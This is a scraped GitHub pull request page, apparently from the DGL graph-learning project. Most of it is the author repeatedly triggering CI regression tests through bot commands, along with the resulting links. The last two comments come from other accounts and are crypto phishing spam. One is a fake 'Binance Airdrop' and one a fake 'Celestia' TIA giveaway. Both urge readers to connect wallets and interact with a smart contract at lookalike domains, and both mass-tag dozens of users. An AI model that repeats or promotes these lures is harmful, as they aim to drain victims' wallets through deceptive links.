### PR TITLE
TTT@T

### PR DESCRIPTION
**Pull request by VoVAllen**
## Checklist
Please feel free to remove inapplicable items for your PR.
- [ ] The PR title starts with [$CATEGORY] (such as [NN], [Model], [Doc], [Feature]])
- [ ] Changes are complete (i.e. I finished coding on this PR)
- [ ] All changes have test coverage
- [ ] Code is well-documented
- [ ] To the my best knowledge, examples are either not affected by this change,
      or have been fixed to be compatible with this change
- [ ] Related issue is referred in this PR
- [ ] If the PR is for a new model/paper, I've updated the example index [here](../examples/README.md).

### CODE REVIEW

**Comment by VoVAllen** [comment]
To trigger all jobs: @dgl-bot run [instance-type] [which tests] [compare-with-branch]; 
 For example: @dgl-bot run g4dn.4xlarge all dmlc/master

**Comment by VoVAllen** [comment]
To trigger all jobs: `@dgl-bot run [instance-type] [which tests] [compare-with-branch]`; 
 For example: `@dgl-bot run g4dn.4xlarge all dmlc/master`

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge all dmlc/master

**Comment by VoVAllen** [comment]
Start the Regression test

**Comment by VoVAllen** [comment]
To trigger all jobs: `@dgl-bot run [instance-type] [which tests] [compare-with-branch]`; 
 For example: `@dgl-bot run g4dn.4xlarge all dmlc/master`

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge all dmlc/master

**Comment by VoVAllen** [comment]
Start the Regression test

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge all dmlc/master

**Comment by VoVAllen** [comment]
Start the Regression test

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge all dmlc/master

**Comment by VoVAllen** [comment]
Start the Regression test

**Comment by VoVAllen** [comment]
Finished the Regression test

**Comment by VoVAllen** [comment]
@dgl-bot run c5.9xlarge all dmlc/master

**Comment by VoVAllen** [comment]
@dgl-bot run c5.9xlarge all dmlc/master

**Comment by VoVAllen** [comment]
Start the Regression test. View at https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/12/display/redirect

**Comment by VoVAllen** [comment]
Finished the Regression test. View at https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/12/display/redirect

**Comment by VoVAllen** [comment]
@dgl-bot run c5.9xlarge all dmlc/master

**Comment by VoVAllen** [comment]
Start the Regression test. View at https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/13/display/redirect

**Comment by VoVAllen** [comment]
Finished the Regression test. View at https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/13/display/redirect

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge api,kernel dmlc/master

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge api,kernel dmlc/master

**Comment by VoVAllen** [comment]
Start the Regression test. View at https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/16/display/redirect

**Comment by VoVAllen** [comment]
Finished the Regression test. Result table is at https://dgl-asv-data.s3-us-west-2.amazonaws.com/da1d2b4f5ab58b635b990eacf8602ad2fffd964f_g4dn4xlarge/results.xlsx. Jenkins job link is https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/16/display/redirect.

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge kernel dmlc/master

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge kernel dmlc/master

**Comment by VoVAllen** [comment]
Start the Regression test. View at https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/18/display/redirect

**Comment by VoVAllen** [comment]
Finished the Regression test. Result table is at https://dgl-asv-data.s3-us-west-2.amazonaws.com/82061b6507451f22b7b91e669d80097f1dbc17d1_g4dn4xlarge/results.xlsx. Jenkins job link is https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/18/display/redirect.

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge kernel dmlc/master

**Comment by VoVAllen** [comment]
Start the Regression test. View at https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/20/display/redirect

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge kernel dmlc/master

**Comment by VoVAllen** [comment]
Start the Regression test. View at https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/22/display/redirect

**Comment by VoVAllen** [comment]
Finished the Regression test. Result table is at https://dgl-asv-data.s3-us-west-2.amazonaws.com/c4463d2e8e42df24b2a6e15af5d8ee5f551628f3_g4dn4xlarge/results/result.csv. Jenkins job link is https://ci.dgl.ai/job/vovallen_dgl/job/PR-5/22/display/redirect.

**Comment by VoVAllen** [comment]
@dgl-bot run g4dn.4xlarge all dmlc/master

**Comment by ChiyuChen0117** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [**Share on Twitter**](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @ChenforCode, @iAqu, @bofu2007, @9penny, @CHENJIAMIAN, @Zzmc1, @qzz0518, @yihanghang, @cdt2019, @citizen-123

**Comment by yuanye2005king** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[Celestia Banner](https://celestia.eigenllayer.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://celestia.eigenllayer.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!alex159s, @arthur1989, @zhonghuatuzi, @HustCoderHu, @Keeplingshi, @yizhongw, @lizj3624, @wigennn, @jameswwb, @qiurenbo, @James-Leezz, @amebamcare, @Colt-M1873, @faying, @taohaox, @alexzhang1, @deanrobin, @38602629, @kanayuki, @42thcoder

**Pull request closed without merging**
